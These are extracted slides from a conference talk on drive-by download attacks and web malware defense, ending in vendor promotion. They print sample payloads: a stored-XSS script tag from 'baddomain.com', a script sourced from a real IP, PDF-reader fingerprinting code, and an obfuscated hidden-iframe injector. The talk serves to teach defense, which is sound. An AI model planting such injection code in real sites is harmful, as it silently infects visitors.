Session ID: xxx-xxxx

Session Classification: xxxxxxxxxxxx

Lars Ewe, Cenzic

Neil Daswani, Dasient

Drive By Downloads: How To Avoid Getting a Cap

Popped in Your App

Drive-By via XSS on RSA Conf Website

Discovered by Gerry Eisenhaur (Dasient)

Persistent XSS in Jive

“Benign” drive-by injected / Pops up calc.exe

Script element embedded in a “tag” at:https://365.rsaconference.com/people/gerrye?view=bookmarks

Un-escaped tag (and benign drive-by) rendered athttps://365.rsaconference.com/view-profile-favorites-list.jspa?targetUser=18102

Yet again -- use of SSL alone does not provide security – code must be made secure also!

Check This Out …

Agenda

Quick History of Security

Malware Anatomy & Distribution

Lifecycle of Malware Protection

Future of Web Security

5

Quick History: Security

Evolution of Security

1980s

Anti-Virus

1986: Brain Virus

(Pakistan)

1990: More viruses –

Fish, Flip, Whale.

1991-98: Famous

Michelangelo.

Symantec introduces

Norton

1998 – 2004: Internet

surge, new viruses =

(Melissa, I love

you, Nimda, SQL

Slammer, Sobig.F, Naa

chi, Sasser) cause

havoc

Over 60K known

viruses. Frequent

updates provided by

vendors.

1990s

Network Security

Late 90s – With the

Explosion of Internet,

network firewalls control

traffic

Intrusion Detection

Systems (IDS)

introduced to monitor

anomalous activity

Intrusion Prevention

Systems (IPS)

combined IDS &

network firewalls

Network vulnerability

scanning tools

introduced to aid

vulnerability

management

2000s

Application Security

Late 90s: Internet growth, companies

tighten the perimeter but ignore

applications

Some vulnerability scanning tools &

WAFs deployed, but security holes

remain – especially for custom apps

Drive-by-downloads mature from

prototype attacks to mainstream

2007: SQL Injection used to inject

malicious drive-by-download code in

addition to data theft

2009: Gumblar web worm infects 80K

servers, Web malware used in Aurora

attack, widget attacks

2010: Over 1M web sites infected in

1 quarter, large Gov websites hit

(NIH, US Treasury, EPA)

Fundamental Change in Malware Distribution

Distribution

methods

Form of malware

Floppy Disks,

Worms

Email

attachments,

file downloads

Drive-by-

downloads (at

legitimate sites)

Active content on

web pages

Late 80s to 90s Late 90s to mid-2000s Mid-2000s to present

Executable code in

static file

Websites suffer brand,

revenue, and customer

losses when infected

Infect clients Infect servers to infect clients

What’s exploited PC, OS, client-side

apps

Web applications

and servers

8

Malware Anatomy & Distribution

Step 1: Infect a Site (or 2 or 3 or Thousands!)

Ads (Malvertising)

Mash-ups

Widgets

External images

User generated content

(HTML, images, links,

exe, documents)

Software

vulnerabilities

Web 2.0/

external content

Infrastructure

vulnerabilitiesPasswords

compromised

There is no perimeter

SQL Injection

XSS

PHP file include

Un-patched

Software (blog,

CMS, shopping cart)

FTP credentials

SSH credentials

Web server credentials

Vulnerable

hosting platform

Network

vulnerabilities

Step 1. Infect via Stored XSS

Http request to inject script:

Server’s response contains:

http://www.mywwwservice.com/update_profile?

Favorite_food=cookies+%3Cscript

src=baddomain.com%3E%3C/script%3E

<p>Your favorite food is 'cookies <script

src=baddomain.com></script>' returned the following

results:</p>

Step 1: Inject Really Malicious JavaScript

Step 1: Inject Really Malicious JavaScript

Step 1: Inject Really Malicious JavaScript

Sources in malicious JavaScript from a compromised IP!

Infects user's machine silently

<script id=_0_ src=//218.93.202.61/cp/></script>

Step 2: Invoke Client-Side Vulnerability

CVE-2008-2992Description: Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104

CVE-2007-5659Description: Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods.

CVE-2009-0927Description: Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIconmethod of a Collab object.

Step 2: Ex. Fingerprint PDF Reader

JavaScript generates a zero-size IFRAME in web page sources in a PDF file

PDF file has JavaScript that fingerprints the version of the PDF reader (Note: JavaScript interpreter used by PDF reader is different than JavaScript interpreter used by browser)

Attacker needs to determine which version of the PDF reader / JavaScript interpreter to target

Step 2: Ex. Fingerprint PDF Reader

function pdf_start(){var

version=app.viewerVersion.toString();version=version.

replace(/\D/g,'');var version_array=new

Array(version.charAt(0),version.charAt(1),version.cha

rAt(2));if((version_array[0]==8)&&(version_array[1]==

0)||(version_array[1]==1&&version_array[2]DA3)){util_

printf();}

if((version_array[0]DA8)||(version_array[0]==8&&versi

on_array[1]DA2&&version_array[2]DA2)){collab_email();

}

if((version_array[0]DA9)||(version_array[0]==9&&versi

on_array[1]DA1)){collab_geticon();}} pdf_start();}

Step 3: Deliver Shellcode

Depending upon version of Adobe PDF Reader / JavaScript interpreter, send appropriate shellcode

“Spray” the heap with assembly instructions that give shell access

Call a PDF reader helper function that jumps to shellcode on the heap (e.g., collab_email())

Step 4: Send ‘Downloader’

Example: 2k8.exe

Step 5: Join a Botnet: e.g. Zeus

Zeus Botnet + Targeted Phishing

Botnet propagation + Targeted Phishing:1. http://internetbanking.

gad.de/banking/

2. http://hsbc.co.uk

3. http://www.mybank.alliance-leicester.co.uk

4. http://www.citibank.de

What Next?

Steal credentials (e.g., Zeus)

Sell fake anti-virus (e.g., Koobface)

Steal FTP credentials (e.g., Gumblar)

Steal corporate secrets (e.g., Aurora)

Collect fraudulent click revenue (e.g., ClickbotA)

Evolution: Multi-DOM Node Injection

<div

id=f37z>*!@g$a+\*t*e##4a+@d^s!

.i!n$f+o@@</div>

<script>document.write('<iframe

src=\''+unescape(document.getEle

mentById('f37z').innerHTML.repla

ce(/[\+!*^#@$]/g,""))+'\' width=0

height=0></iframe>');

Evolution: Multi-DOM Node Injection

<div

id=f37z>*!@g$a+\*t*e##4a+@d^s!

.i!n$f+o@@</div>

<script>document.write('<iframe

src=\''+unescape(document.getEle

mentById('f37z').innerHTML.repla

ce(/[\+!*^#@$]/g,""))+'\' width=0

height=0></iframe>');

<iframe

src=gate4ad

s.info

width=0

height=0></i

frame>

Infection Library

Infection Library: Example Entry

26

Lifecycle of Malware Protection

Defense-In-Depth:Lifecycle of Malware Protection

Assess

Detect

Contain

Recover

Prevent

Vulnerability & Malware Risk Assessment

Security Design Review, Secure Coding

Practices, Fix Bugs, WAF, Code Reviews

Web Anti-Malware (WAM) Monitoring

mod_antimalware

Remove malcode

28

Future of Web Security

Risk Tolerance

F500

G1000

SME

SMB

Mission Critical

Security

Important

Security

Adequate

Security

Integrated Web Scanning

/ Malware Cloud Solution

(Cenzic / Dasient)

Broad offering

High volume

Low cost

On-premise software

Managed Service

Manage Website Risk: Fast & Easy

Test All Apps For HealthCheck

Strong Testing for Important Apps

Robust Testing for

Critical Apps

R

I

S

K

S

C

O

R

E

Low

High

Takeaways: What You Should Do Within 3 Months

Test ALL your web applications via a HealthCheck Test for both application vulnerabilities and malware

Prioritize your vulnerabilities based on risk score

Block until you remediate

Get Feb 2011 Ponemon research report on the state of web application security

Integrated HealthCheck Offer & Learn More

Get a Free, Integrated Website HealthCheck! Get a listing of all website

vulnerabilities in an easy to read report!

Just email: appmal@cenzic.com

For more information on Web vulnerability scanning and malware, visit us! Cenzic

www.cenzic.com / http://blog.cenzic.com

Dasient www.dasient.com / http://blog.dasient.com

34

Thank You!

Lars Ewe, Cenzic

Neil Daswani, Dasient